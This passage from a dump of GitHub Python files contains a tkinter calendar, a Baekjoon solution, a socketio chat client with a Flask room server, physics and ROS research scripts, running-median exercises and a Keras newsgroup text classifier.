self.holipath = holidaypath\n self._fill()\n\n def _back(self):\n \"\"\"\n return calendar to prev month\n :return: void\n \"\"\"\n self.month -= 1\n\n if self.month == 0:\n self.month = 12\n self.year -= 1\n\n self._fill()\n\n def _next(self):\n \"\"\"\n return calendar to next month\n :return: void\n \"\"\"\n self.month += 1\n\n if self.month == 13:\n self.month = 1\n self.year += 1\n\n self._fill()\n\n def _fill(self):\n \"\"\"\n fill all square with data and coloring it\n :return: void\n \"\"\"\n self.add_hol_area.delete('1.0', END)\n self.days.clear()\n self._reload_holidays()\n\n for n in range(7):\n lbl = Label(self.root, text=calendar.day_abbr[n], width=1, height=1, font='Arial 10 bold', fg='darkblue')\n lbl.grid(row=1, column=n, sticky=NSEW)\n\n for row in range(6):\n for col in range(7):\n if col == 5 or col == 6:\n lbl = Label(self.root, text='0', width=4, height=2, font='Arial 16 bold', bg='red')\n else:\n lbl = Label(self.root, text='0', width=4, height=2, font='Arial 16 bold')\n lbl.grid(row=row + 2, column=col, sticky=NSEW)\n self.days.append(lbl)\n\n self.info_label['text'] = calendar.month_name[self.month] + ',' + str(self.year)\n month_days = calendar.monthrange(self.year, self.month)[1]\n\n if self.month == 1:\n back_monts_days = calendar.monthrange(self.year - 1, 12)[1]\n else:\n back_monts_days = calendar.monthrange(self.year, self.month - 1)[1]\n\n week_day = calendar.monthrange(self.year, self.month)[0]\n\n for n in range(month_days):\n self.days[week_day + n]['text'] = n + 1\n self.days[week_day + n]['fg'] = 'black'\n if self.year == self.now.year and self.month == self.now.month and n == self.now.day - 1:\n self.days[week_day + n]['bg'] = 'green'\n else:\n if self.days[week_day + n]['bg'] == 'red':\n continue\n else:\n self.days[week_day + n]['bg'] = '#d2d2d2'\n\n for elem in self.holidays:\n if int(elem[0]) == self.month and self.days[week_day + int(elem[1]) - 1]['bg'] != 'green':\n self.days[week_day + int(elem[1]) - 1]['bg'] = 'red'\n\n for n in range(week_day):\n self.days[week_day - n - 1]['text'] = back_monts_days - n\n self.days[week_day - n - 1]['fg'] = 'grey'\n if self.days[week_day - n - 1]['bg'] == 'red':\n self.days[week_day - n - 1]['bg'] = '#a10000'\n continue\n self.days[week_day - n - 1]['bg'] = '#f3f3f3'\n\n for elem in self.holidays:\n if int(elem[0]) == self.month - 1 and week_day - back_monts_days + int(elem[1]) - 1 > -1:\n self.days[week_day - back_monts_days + int(elem[1]) - 1]['bg'] = '#a10000'\n\n for n in range(6 * 7 - month_days - week_day):\n self.days[week_day + n + month_days]['text'] = n + 1\n if self.days[week_day + n + month_days]['bg'] == 'red':\n self.days[week_day + n + month_days]['bg'] = '#a10000'\n continue\n self.days[week_day + n + month_days]['fg'] = 'grey'\n self.days[week_day + n + month_days]['bg'] = '#f3f3f3'\n\n for elem in self.holidays:\n if int(elem[0]) == self.month + 1 and (month_days + int(elem[1]) < 6 * 7):\n self.days[month_days + int(elem[1]) + 1]['bg'] = '#a10000'\n\n self.add_hol_area.insert(END, \"дд.мм (напр: 01.01)\")\n\n def start(self):\n \"\"\"\n loading interface and start it in mainloop\n :return: void\n \"\"\"\n self.root.mainloop()\n\n def _reload_holidays(self):\n \"\"\"\n reload holidays\n :return: void\n \"\"\"\n self.holidays.clear()\n f = open(self.holipath, 'r')\n for elem in f:\n if elem == '\\n':\n break\n month, days = elem.split(sep='.')\n self.holidays.append([month, days])\n f.close()\n\n def _add_holi(self):\n \"\"\"\n add new holidays in list\n :return: void\n \"\"\"\n date = 
''.join(char for char in self.add_hol_area.get('1.0', END) if char.isalnum() or char == '.')\n if len(date) != 5 or date[2] != '.' or str(date[0:2] + date[3:5]).isnumeric() == False:\n return\n\n f = open(self.holipath, 'a')\n f.write(date[3:5] + '.' + date[0:2] + '\\n')\n f.close()\n self._fill()\n\n def _rem_holi(self):\n \"\"\"\n rem holidays in list\n :return: void\n \"\"\"\n date = ''.join(char for char in self.add_hol_area.get('1.0', END) if char.isalnum() or char == '.')\n if len(date) != 5 or date[2] != '.' or str(date[0:2] + date[3:5]).isnumeric() == False:\n return\n\n date = date[3:5] + '.' + date[0:2]\n f = open(self.holipath, 'r')\n f2 = open(str(self.holipath + 't'), 'w')\n\n for s in f:\n if s[:5] == date[:5]:\n continue\n f2.write(s + '\\n')\n\n f.close()\n f2.close()\n f = open(self.holipath, 'w')\n f2 = open(str(self.holipath + 't'), 'r')\n\n for s in f2:\n f.write(s + '\\n')\n\n f2.close()\n f.close()\n self._fill()\n","repo_name":"Ruvik1001/Calendar","sub_path":"Lib/MyCalendar.py","file_name":"MyCalendar.py","file_ext":"py","file_size_in_byte":7452,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"23890437974","text":"import sys\n\nn = int(input())\ndt = [list(map(int,input().split())) for _ in range(n)]\n\nrl = [0,0]\ndef jd(n, x, y):\n\n if n > 1:\n for i in range(x,x+n):\n for j in range(y,y+n):\n if dt[x][y] != dt[i][j]:\n jg = False\n jd(n//2, int(x), y)\n jd(n//2, x+n//2, y)\n jd(n//2, x, y+n//2)\n jd(n//2, x+n//2, y+n//2)\n return\n else:\n continue\n\n if dt[x][y] == 1:\n rl[1] += 1\n else:\n rl[0] += 1\n\n\njd(n,int(0),int(0))\nprint(rl[0])\nprint(rl[1])","repo_name":"leechi2/LCL_WORLD","sub_path":"baekjoon/단계별/분할 정복/2630.py","file_name":"2630.py","file_ext":"py","file_size_in_byte":630,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"28199390359","text":"import asyncio\nimport tempfile\nfrom datetime import datetime\nfrom pathlib import Path\n\nimport socketio\nfrom aioconsole import ainput\nDELAY = 0.01\nclient = socketio.AsyncClient()\nCREDS_FILE = Path(\n tempfile.gettempdir(), \"shellhacks_chatserver_auth\")\n\n\ndef display_room_history(message_history):\n for message in message_history:\n timestamp = datetime.fromisoformat(message['timestamp']).time()\n print(timestamp, message['user']['username'] + \":\", message['message'])\n\n\ndef display_rooms(rooms):\n for room in rooms:\n print(F\"{room['name']} ({room['users']})\")\n\n\n@client.event\nasync def chat_message(data):\n timestamp = datetime.fromisoformat(data['timestamp']).time()\n print(timestamp, data['user']['username'] + \":\", data['message'])\n\n\n@client.event\nasync def room_join(username: str):\n print(F\"SERVER: User {username} has joined the room\")\n\n\nasync def read_user_input():\n while True:\n # print(\"[+] \", end='')\n _input: str = await ainput()\n if _input.strip() == '':\n continue\n if _input.lower().startswith('/help'):\n print(\"\"\"Commands available:\n /help: Displays this screen\n /rooms: Displays all available rooms\n /pwr: Displays current room\n /join: Creates a room if it does not exist and joins it, other wise it just joins it\n /history: Displays History of the chat room\n /find: Find a user by username \n /quit: exit the application\"\"\")\n continue\n if _input.lower().strip() in ['/exit', '/quit', '/q']:\n return\n\n if _input.lower().startswith('/pwr'):\n await client.emit('current_room', callback=print)\n await client.sleep(DELAY)\n 
continue\n\n if _input.lower().startswith('/join '):\n room = _input.split(' ')[1]\n await client.emit('switch_room', room)\n await client.sleep(DELAY)\n continue\n\n if _input.lower().strip() == \"/rooms\":\n await client.emit('list_rooms', callback=display_rooms)\n await client.sleep(DELAY)\n continue\n\n if _input.lower().strip() == \"/history\":\n await client.emit('room_history', callback=display_room_history)\n await client.sleep(DELAY)\n continue\n\n if _input.lower().strip().startswith(\"/find\"):\n def callback(data):\n print(data)\n [_, user, *_] = _input.strip().split(' ')\n\n await client.emit('find_user', data=user, callback=callback)\n await client.sleep(DELAY)\n continue\n\n await client.emit('chat_message', _input)\n await client.sleep(DELAY)\n\n\nasync def main():\n if CREDS_FILE.exists() and CREDS_FILE.read_text():\n username = CREDS_FILE.read_text()\n else:\n username = input(\"Please enter your username: \").replace(\" \", \"_\")\n CREDS_FILE.write_text(username)\n await client.connect('http://34.138.239.197:8080', auth={'username': username})\n\n await read_user_input()\n await client.disconnect()\n\n\nif __name__ == \"__main__\":\n try:\n loop = asyncio.get_event_loop()\n loop.run_until_complete(main())\n except KeyboardInterrupt:\n exit(1)","repo_name":"CavemanJay/shellhacks","sub_path":"client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":3275,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"41605583709","text":"from profile_llh import *\n\nimport os\nimport argparse\nfrom datetime import datetime\n\n\ndef compute_sensitivities(interaction,DM,nbins,N,slurm):\n start_time = datetime.now()\n print('Starting ...')\n model_params = np.loadtxt(f'../created_files/model_params_{interaction}_N_{str(N)}.txt')\n len_params = len(model_params)\n print(f'Parameters loaded -- {datetime.now() - start_time} s')\n print()\n if slurm == True:\n job_id = os.getenv('SLURM_ARRAY_TASK_ID')\n break_points=int(len_params/10)\n start = int(job_id)*break_points\n end = (int(job_id)+1)*break_points\n if int(job_id) == 9 and end != len_params:\n end = len_params\n len_list = end - start\n else:\n # run locally\n job_id = 0\n start = job_id\n end = len_params\n len_list = end - start\n\n TS_ = np.zeros(len_list)\n NUIS_ = np.zeros((len_list,2))\n\n for i, params in enumerate(model_params[start:end]):\n g,mphi,mx = params\n t_llh = datetime.now()\n p_llh = ProfileLogLikelihood_DNN(g,mphi,mx,interaction,nbins)\n print(f'LLH Initialized -- {datetime.now() - t_llh} s')\n\n t_min = datetime.now()\n ts,nuis = p_llh(DM)\n # nuis = [1.66,2.53]\n # ts = p_llh.TestStatistics(nuis, DM=DM)\n print(f'LLH Minimizer Complete -- {datetime.now() - t_min} s')\n\n if DM == True:\n fname = 'inj-rec'\n else:\n fname = 'asimov'\n\n print(i,fname,'params = ',params,'TS = ',ts,'n_astro, gamma = ',nuis)\n TS_[i] = ts\n NUIS_[i,:] = nuis\n print(f'Total time elapsed per interaction: {datetime.now() - t_llh} s \\n')\n print()\n\n np.savetxt('../created_files/sensitivities/ts_profile_'+fname+'_N_'+str(N)+'_'+interaction+'_'+str(job_id)+'.txt', TS_)\n np.savetxt('../created_files/sensitivities/nuissance_profile_'+fname+'_N_'+str(N)+'_'+interaction+'_'+str(job_id)+'.txt', NUIS_)\n print('Files saved in ../created_files/sensitivities/')\n print(f'Computation completed -- Total time elapsed: {datetime.now() - start_time}')\n\n\ndef main():\n interaction = args.interaction\n DM = args.DM\n nbins = args.nbins\n N = args.N\n slurm = args.slurm\n 
compute_sensitivities(interaction,DM,nbins,N,slurm)\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='This script creates sensitivities for a given DM model')\n parser.add_argument('--interaction', type=str, choices=['scalar','fermion','vector','fermscal'],required=True , help='Dark Matter - Scattering model')\n parser.add_argument('--DM', required=True, action=argparse.BooleanOptionalAction,help='Compute Asimov (--no-DM) or Inject-Recover (--DM) sensitivities.')\n parser.add_argument('-n', '--nbins', default=25, type=int, help='Number of bins for event parameters (E,RA,DEC)')\n parser.add_argument('-N', default=10, type=int, help='Number of bins for DM parameters (g,mx,mphi)')\n parser.add_argument('--slurm', default=False,action='store_true', help='Defines the cluster array job id')\n args = parser.parse_args()\n main()\n","repo_name":"diyaselis/darkmatter_neutrino_scattering","sub_path":"code/create_profile_sens.py","file_name":"create_profile_sens.py","file_ext":"py","file_size_in_byte":3110,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"2700745770","text":"# Compute the running median of a sequence of numbers. \n# That is, given a stream of numbers, print out the median of the list so far on each new element.\n\n# Recall that the median of an even-numbered list is the average of the two middle numbers in a sorted list.\n\n# For example, given the sequence [2, 1, 5, 7, 2, 0, 5], your algorithm should print out:\n# 2\n# 1.5\n# 2\n# 3.5\n# 2\n# 2\n# 2\ndef print_median(elements, length_left):\n if length_left % 2 == 0:\n first_num = elements[int((length_left/2)-1)]\n sec_num = elements[int((length_left/2))]\n median = (first_num + sec_num) / 2\n else:\n median = elements[int(length_left // 2)]\n print(median)\n\ndef insertion_sort(elements):\n print(elements[0])\n for i in range(1, len(elements)): \n if i != 1:\n print_median(elements, i)\n anchor = elements[i] \n j = i - 1 \n while j >= 0 and anchor < elements[j]:\n elements[j+1] = elements[j] \n j -= 1\n elements[j+1] = anchor\n print_median(elements, len(elements))\n\n#codebasics solution\ndef place_to_insert(array, key):\n index = 0 #starts algo at first element\n for i in array: #iterates through current stream list\n if i > key: #if the new value is less than this element\n break #gets out of loop to return the index it should insert at\n else:\n index += 1 #if the new value is greater than any elements -> keep increasing index to insert at\n return index #returns the index new value should be inserted at\ndef insert_to_sorted(array, key):\n index = place_to_insert(array, key) #gets index of where new value should be added in list\n return array[0:index]+[key]+array[index:] #returns list with added element in right position\n\nif __name__ == '__main__':\n elements = [2, 1, 5, 7, 2, 0, 5]\n insertion_sort(elements)\n \n print()\n \n #codebasics solution - uses input of elements in list\n #NOTE: use debugger to see algo in progress\n \n stream = [] #keeps the stream in a separate list that stays sorted\n count = 0 #keeps track of number of elements in stream (for getting median)\n while(True):\n i = int(input())\n count += 1 #increases count for each element added to stream\n stream = insert_to_sorted(stream, i) #calls second function on the current stream list with the new value i\n if count % 2 == 1: #below is the algo for finding median in current stream list\n print(f\"Median of {stream} : {stream[(count)//2]}\")\n else:\n i1 = count//2\n 
i2 = (count//2) - 1\n print(f\"Median of {stream} : {(stream[i1] + stream[i2])/2}\")","repo_name":"ishaansathaye/DataStructAlgorithms","sub_path":"InsertionSort/InsertionSortProblems/runningMedian.py","file_name":"runningMedian.py","file_ext":"py","file_size_in_byte":2674,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"6963664177","text":"import os\nimport rospy\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nfrom cv_bridge import CvBridge\nfrom sensor_msgs.msg import Image\nfrom tactile_msgs.msg import TactileState\nfrom geometry_msgs.msg import WrenchStamped\n\nfrom tf import TransformListener, TransformBroadcaster\nfrom datetime import datetime\nfrom learn_placing.common import v2l, line_angle_from_rotation, models_theta_plot, preprocess_myrmex, tft, rotation_from_line_angle, cr_plot_setup\nfrom learn_placing.estimators import NetEstimator, PCABaseline, HoughEstimator\n\n\nclass RunEstimators:\n world_frame = \"base_footprint\"\n grasping_frame = \"gripper_grasping_frame\"\n object_frame = \"object\"\n mm_left, mm_right, ft = None, None, None\n\n def __init__(self, trial_path, noise_thresh, publish_image=False):\n self.trial_path = trial_path\n self.noise_thresh = noise_thresh\n self.publish_image = publish_image\n \n # create NN and baseline models\n self.nn = NetEstimator(trial_path)\n self.pca = PCABaseline(noise_thresh=self.noise_thresh)\n self.hough = HoughEstimator(noise_thresh=self.noise_thresh, preproc=\"binary\")\n\n self.ftsub = rospy.Subscriber(\"/wrist_ft\", WrenchStamped, callback=self.ft_cb)\n self.tlsub = rospy.Subscriber(\"/tactile_left\", TactileState, callback=self.tl_cb)\n self.trsub = rospy.Subscriber(\"/tactile_right\", TactileState, callback=self.tr_cb)\n\n if self.publish_image: \n self.bridge = CvBridge()\n self.imgpub = rospy.Publisher(\"/estimator_image\", Image, queue_size=1)\n\n self.br = TransformBroadcaster()\n self.li = TransformListener()\n self.li.waitForTransform(self.world_frame, self.grasping_frame, rospy.Time(0), rospy.Duration(5))\n\n cr_plot_setup()\n \n def tl_cb(self, m): self.mm_left = preprocess_myrmex(m.sensors[0].values)\n def tr_cb(self, m): self.mm_right = preprocess_myrmex(m.sensors[0].values)\n def ft_cb(self, m): self.ft = np.concatenate([v2l(m.wrench.force), v2l(m.wrench.torque)])\n\n def reset_data(self):\n self.mm_left, self.mm_right, self.ft = None, None, None\n\n def estimate(self):\n while np.any([self.mm_left, self.mm_right, self.ft] == None):\n print(\"waiting for data ...\")\n rospy.Rate(1).sleep()\n\n # get gripper and object orientations\n (_, Qwg) = self.li.lookupTransform(self.world_frame, self.grasping_frame, rospy.Time())\n try:\n # TODO make this more sensitive to lost TFs while avoiding extrapolation into the future exception\n (_, Qwo) = self.li.lookupTransform(self.world_frame, self.object_frame, rospy.Time())\n (_, Qgo) = self.li.lookupTransform(self.grasping_frame, self.object_frame, rospy.Time())\n detected = True\n except Exception as e:\n print(f\"ERROR couldn't get transform. 
¿is the object being detected?\\n{e}\")\n Qgo = [0,0,0,1]\n detected = False\n\n Qwg = np.array(Qwg)\n Qgo = np.array(Qgo)\n\n # preprocess data\n mm = np.squeeze(np.stack([self.mm_left, self.mm_right]))\n lblth = line_angle_from_rotation(Qgo)\n\n # run models\n (R_nn, nnth), (nnerr, _) = self.nn.estimate_transform(mm, Qgo, Qwg=Qwg, ft=[self.ft.copy()])\n (R_pca, pcath), (pcaerr, _) = self.pca.estimate_transform(mm, Qgo)\n (R_hou, houth), (houerr, _) = self.hough.estimate_transform(mm, Qgo)\n\n print()\n print(f\"LBL {lblth:.4f}\")\n print(f\"NN {nnth:.4f} | {nnerr:.4f}\")\n print(f\"PCA {pcath:.4f} | {pcaerr:.4f}\")\n print(f\"HOU {houth:.4f} | {houerr:.4f}\")\n\n # broadcast transforms\n for name, R in zip([\"nn\", \"pca\", \"hough\"], [R_nn, R_pca, R_hou]):\n if R is None or np.any(np.isnan(np.array(R))): # handle NaNs / models not detecting lines\n print(f\"skipping {name} due to NaN\")\n continue\n\n T = tft.ensure_homog(R)\n self.br.sendTransform(\n [0,0,0],\n tft.quaternion_from_matrix(T),\n rospy.Time.now(),\n f\"object_{name}\",\n self.grasping_frame\n )\n\n if self.publish_image:\n scale=100\n fig, ax = plt.subplots(ncols=1, figsize=1.8*np.array([10,9]))\n\n self.pca.plot_PCs(ax, mm, scale=scale)\n\n if detected:\n lines = [\n # [lblth, f\"OptiTrack (lblth)\", \"green\"],\n # [nnth, f\"NN {nnerr:.3f}\", \"red\"],\n # [pcath, f\"PCA {pcaerr:.3f}\", \"blue\"],\n # [houth, f\"HOU {houerr:.3f}\", \"white\"],\n\n [lblth, \"Ground-truth\", \"white\"],\n [nnth, f\"Tactile-only \", \"red\"],\n [pcath, f\"PCA \", \"#04D9FF\"],\n [houth, f\"Hough \", \"#41F94A\"],\n ]\n else:\n lines = [\n [nnth, f\"Tactile-only \", \"red\"],\n [pcath, f\"PCA \", \"#04D9FF\"],\n [houth, f\"Hough \", \"#41F94A\"],\n ]\n\n models_theta_plot(\n mm_imgs=mm,\n noise_thresh=self.noise_thresh,\n ax=ax,\n fig=fig,\n scale=scale,\n lines=lines\n )\n\n # ax.set_title(f\"Estimation Results [{datetime.now().strftime('%H:%M:%S')}]\")\n fig.tight_layout()\n fig.canvas.draw()\n\n # Now we can save it to a numpy array.\n data = np.frombuffer(fig.canvas.tostring_rgb(), dtype=np.uint8)\n data = data.reshape(fig.canvas.get_width_height()[::-1] + (3,))\n\n imgmsg = self.bridge.cv2_to_imgmsg(data, encoding=\"rgb8\")\n self.imgpub.publish(imgmsg)\n plt.close()\n\n result = dict(zip([\"nn\", \"pca\", \"hough\"],\n [\n [tft.ensure_homog(R_nn), nnerr],\n [R_pca, pcaerr],\n [R_hou, houerr],\n ]\n ))\n if detected:\n result.update({\"opti\": [rotation_from_line_angle(lblth), 0]})\n return result\n\nif __name__ == \"__main__\":\n noise_thresh = 0.05\n # trial_path = f\"{os.environ['HOME']}/tud_datasets/batch_trainings/ias_training_new_ds/Combined3D/Combined3D_Neps40_static_tactile_2022.09.13_10-41-43\"\n # trial_path = f\"{os.environ['HOME']}/tud_datasets/batch_trainings/ias_training_new_ds/Combined3D/Combined3D_Neps40_static_tactile_gripper_2022.09.13_10-42-03\"\n # trial_path = f\"{os.environ['HOME']}/tud_datasets/batch_trainings/2023.02.13_18-45-21/CombinedAll/CombinedAll_Neps40_static_tactile_2023.02.13_18-45-21\"\n # trial_path = f\"{os.environ['HOME']}/tud_datasets/batch_trainings/2023.02.22_15-25-54/UPC_v1/UPC_v1_Neps60_static_tactile_2023.02.22_15-25-54\"\n\n # trial_path = f\"{os.environ['HOME']}/tud_datasets/chosen_ones/UPC_v1_Neps60_static_tactile_2023.02.23_09-27-55\"\n # trial_path = f\"{os.environ['HOME']}/tud_datasets/chosen_ones/UPC_v1_Neps60_static_tactile_ft_2023.02.23_14-04-41\"\n # trial_path = f\"{os.environ['HOME']}/tud_datasets/chosen_ones/UPC_v1_Neps60_static_ft_2023.02.23_14-04-25\"\n trial_path = 
f\"{os.environ['HOME']}/tud_datasets/batch_trainings/2023.02.24_10-41-09/UPC_v1/UPC_v1_Neps60_static_tactile_2023.02.24_10-41-09\"\n\n\n    rospy.init_node(\"run_estimator\")\n\n    # normal streaming\n    re = RunEstimators(trial_path, noise_thresh=noise_thresh, publish_image=True)\n    while not rospy.is_shutdown(): re.estimate()\n\n    # re = RunEstimators(trial_path, noise_thresh=noise_thresh, publish_image=True)\n    # while not rospy.is_shutdown():\n    #     a = input()\n    #     if a.lower() == \"q\": break\n\n    #     re.estimate()\n","repo_name":"llach/learn_placing","sub_path":"execute_placing/run_estimator.py","file_name":"run_estimator.py","file_ext":"py","file_size_in_byte":7731,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"}
+{"seq_id":"7960736796","text":"# -*- coding: UTF-8 -*-\n# @Author  : Chaos-ThinkPad\n# @Email   : WuChao0918@qq.com\n# @Software: PyCharm\n# @Time    : 2021-9-1 21:38\n# @Project : Learn.py\n# @File    : 进程01.py\n\nimport os\nfrom multiprocessing import Process\nfrom time import sleep\n\n\ndef task1(s, name):\n    while True:\n        sleep(s)\n        print('This is task 1...', os.getpid(), '-----', os.getppid(), name)\n\n\ndef task2(s, name):\n    while True:\n        sleep(s)\n        print('This is task 2...', os.getpid(), '-----', os.getppid(), name)\n\n\nnumber = 1\nif __name__ == '__main__':\n    print(os.getpid())\n    # child processes\n    p1 = Process(target=task1, name='Task 1', args=(2, 'aa'))\n    p1.start()\n    print(p1.name)\n    p2 = Process(target=task2, name='Task 2', args=(2, 'bb'))\n    p2.start()\n    print(p2.name)\n\n    while True:\n        number += 1\n        sleep(0.2)\n        if number == 100:\n            p1.terminate()\n            p2.terminate()\n            break\n        else:\n            print('---->number:', number)\n\n    print('*' * 20)\n","repo_name":"wuchaos0918/Learn","sub_path":"python_learn/进程01.py","file_name":"进程01.py","file_ext":"py","file_size_in_byte":1021,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"5764316827","text":"from flask import Flask, request, jsonify\nfrom subprocess import Popen\nimport random, uuid\nimport argparse\n\nparser = argparse.ArgumentParser(description='Start the server with the given server executable.')\nparser.add_argument(\"--server-executable\", type=str, help=\"The path to the server executable.\", default=\"./builds/server.app/Contents/MacOS/BlonkServer\")\n\napp = Flask(__name__)\n\nrooms = {}\n\n@app.route('/create_room')\ndef create_room():\n    port = random.randint(8000, 9000)\n    room_key = str(uuid.uuid4())[:8]\n\n    Popen([parser.parse_args().server_executable, \"--headless\", \"--port=\" + str(port), \"--key=\" + room_key])\n\n    rooms[room_key] = {\"port\": port, \"players\": []}\n\n    return {\"status\": \"success\", \"port\": port, \"key\": room_key}\n\n@app.route('/join_room', methods=['POST'])\ndef join_room():\n    data = request.json\n    room_key = data.get('key')\n\n    if room_key in rooms:\n        port = rooms[room_key]['port']\n        return {\"status\": \"success\", \"port\": port, \"key\": room_key}\n    else:\n        return {\"status\": \"failed\", \"message\": \"Invalid room key\"}, 400\n\nif __name__ == '__main__':\n    app.run(host='0.0.0.0', port=25565)","repo_name":"jcurtis06/blonk","sub_path":"server/master_server.py","file_name":"master_server.py","file_ext":"py","file_size_in_byte":1133,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"}
+{"seq_id":"38699611679","text":"import pandas as pd\nimport numpy as np\nimport pickle\nfrom keras.preprocessing.text import Tokenizer\nfrom keras.models import Sequential\n
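# [Editor's aside] terminate() in the multiprocessing demo above stops the
# workers abruptly. A hedged sketch of a cooperative shutdown with
# multiprocessing.Event; the names below are illustrative, not from the original.
from multiprocessing import Event, Process
from time import sleep

def worker(stop_event, delay, name):
    while not stop_event.is_set():
        sleep(delay)
        print('task', name, 'still running')

if __name__ == '__main__':
    stop = Event()
    p = Process(target=worker, args=(stop, 0.5, 'demo'))
    p.start()
    sleep(2)
    stop.set()  # ask the worker to leave its loop
    p.join()    # then wait for a clean exit instead of terminate()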
from keras.layers import Activation, Dense, Dropout\nfrom sklearn.preprocessing import LabelBinarizer\nimport sklearn.datasets as skds\nfrom pathlib import Path\nimport matplotlib.pyplot as plt\nimport itertools\nfrom sklearn.metrics import confusion_matrix\n\n\n\n# Directory with the datasets\npath_train = \"dataset/20news-bydate-train\"\nfiles_train = skds.load_files(path_train,load_content=False)\nlabel_index = files_train.target\nlabel_names = files_train.target_names\nlabelled_files = files_train.filenames\ndata_tags = [\"filename\",\"category\",\"news\"]\ndata_list = []\n\n# Load every file together with its category value and append them to a list\ni=0\nfor f in labelled_files:\n    print(f'Loading file {f}')\n    data_list.append((f,label_names[label_index[i]],Path(f).read_text(errors='ignore')))\n    i += 1\n\n# Build a dataframe holding each file name, its category and its text\ndata = pd.DataFrame.from_records(data_list, columns=data_tags)\n\n# Network parameters\nnum_labels = 20\nvocab_size = 15000\nbatch_size = 100\nnum_epochs = 30\n\n# Split the set into 80% training and 20% test\ntrain_size = int(len(data) * .8)\n\ntrain_posts = data['news'][:train_size]\ntrain_tags = data['category'][:train_size]\ntrain_files_names = data['filename'][:train_size]\n\ntest_posts = data['news'][train_size:]\ntest_tags = data['category'][train_size:]\ntest_files_names = data['filename'][train_size:]\n\n# We need to turn the words into tokens that we can\n# use to train the network, via the tokenizer\ntokenizer = Tokenizer(num_words=vocab_size)\ntokenizer.fit_on_texts(train_posts)\nx_train = tokenizer.texts_to_matrix(train_posts, mode='tfidf')\nx_test = tokenizer.texts_to_matrix(test_posts, mode='tfidf')\n\n# For the labels we use LabelBinarizer to transform them\nencoder = LabelBinarizer()\nencoder.fit(train_tags)\ny_train = encoder.transform(train_tags)\ny_test = encoder.transform(test_tags)\n\n\n# Define the neural network\nmodel = Sequential()\nmodel.add(Dense(512, input_shape=(vocab_size,)))\nmodel.add(Activation('relu'))\nmodel.add(Dropout(0.3))\nmodel.add(Dense(512))\nmodel.add(Activation('relu'))\nmodel.add(Dropout(0.3))\nmodel.add(Dense(num_labels))\nmodel.add(Activation('softmax'))\n\n\n# Compile it using adam\nmodel.compile(loss='categorical_crossentropy',\n              optimizer='adam',\n              metrics=['accuracy'])\n# Train the network\nhistory = model.fit(x_train, y_train,\n                    batch_size=batch_size,\n                    epochs=num_epochs,\n                    verbose=1,\n                    validation_split=0.1)\n# Evaluate its accuracy on the test set\nscore = model.evaluate(x_test, y_test,\n                       batch_size=batch_size, verbose=1)\n\nprint('Test accuracy:', score[1])\n\ntext_labels = encoder.classes_\n\nfor i in range(10):\n    prediction = model.predict(np.array([x_test[i]]))\n    # Pick, among the network outputs, the one with the\n    # highest probability value\n    predicted_number=np.argmax(prediction[0])\n    predicted_label = text_labels[predicted_number]\n    print(test_files_names.iloc[i])\n    print('Actual label:' + test_tags.iloc[i]+' Probability: '+str(prediction[0][predicted_number]))\n    print(\"Predicted label: \" + predicted_label)\n\ndef plot_confusion_matrix(cm, classes,\n                          normalize=False,\n                          title='Confusion matrix',\n                          cmap=plt.cm.Blues):\n    \"\"\"\n    This function prints and plots the confusion matrix.\n    Normalization can be applied by setting `normalize=True`.\n    \"\"\"\n    if normalize:\n        cm = cm.astype('float') / cm.sum(axis=1)[:, np.newaxis]\n        print(\"Normalized confusion matrix\")\n    else:\n        print('Confusion matrix, without 
normalization')\n\n # print(cm)\n\n plt.imshow(cm, interpolation='nearest', cmap=cmap)\n plt.title(title)\n plt.colorbar()\n tick_marks = np.arange(len(classes))\n plt.xticks(tick_marks, classes, rotation=90)\n plt.yticks(tick_marks, classes)\n\n fmt = '.2f' if normalize else 'd'\n thresh = cm.max() / 2.\n for i, j in itertools.product(range(cm.shape[0]), range(cm.shape[1])):\n plt.text(j, i, format(cm[i, j], fmt),\n horizontalalignment=\"center\",\n color=\"white\" if cm[i, j] > thresh else \"black\")\n\n plt.tight_layout()\n plt.ylabel('True label')\n plt.xlabel('Predicted label')\n\n\ny_pred = model.predict(x_test)\ncnf_matrix = confusion_matrix(np.argmax(y_test, axis=1), np.argmax(y_pred, axis=1))\n\n# Plot normalized confusion matrix\nfig = plt.figure()\nfig.set_size_inches(14, 12, forward=True)\nfig.align_labels()\n\n# fig.subplots_adjust(left=0.0, right=1.0, bottom=0.0, top=1.0)\nplot_confusion_matrix(cnf_matrix, classes=np.asarray(label_names), normalize=True,\n title='Normalized confusion matrix')\n\nfig.savefig(\"txt_classification-\" + str(num_epochs) + \".png\", pad_inches=5.0)\n","repo_name":"franusierra/keras-lab","sub_path":"ejemplo_texto/ejemplo_texto.py","file_name":"ejemplo_texto.py","file_ext":"py","file_size_in_byte":5018,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"45221352405","text":"import logging\n\n\ndef get_logger(name, level=None):\n \"\"\"\n Parameters\n ----------\n name: `str`, required\n Name of the logger.\n\n level: `str`, optional (default=None)\n Level of the logger. The default is None.\n\n Returns\n -------\n `logging.Logger`: the logger object will be returned.\n \"\"\"\n level = logging.INFO if level is None else level\n logging.basicConfig(format='%(asctime)s - %(name)s - %(levelname)s - %(message)s', level=level)\n logger = logging.getLogger(name)\n logger.setLevel(level)\n return logger\n","repo_name":"shayanfazeli/graphite_pcqm4mv2","sub_path":"graphite/utilities/logging.py","file_name":"logging.py","file_ext":"py","file_size_in_byte":562,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"973311252","text":"import os\nimport numpy as np\nimport pandas as pd\nfrom pandas.tseries.holiday import USFederalHolidayCalendar\nfrom pathlib import Path\nimport yaml\nimport itertools\n\ndef data_preprocess(years):\n # 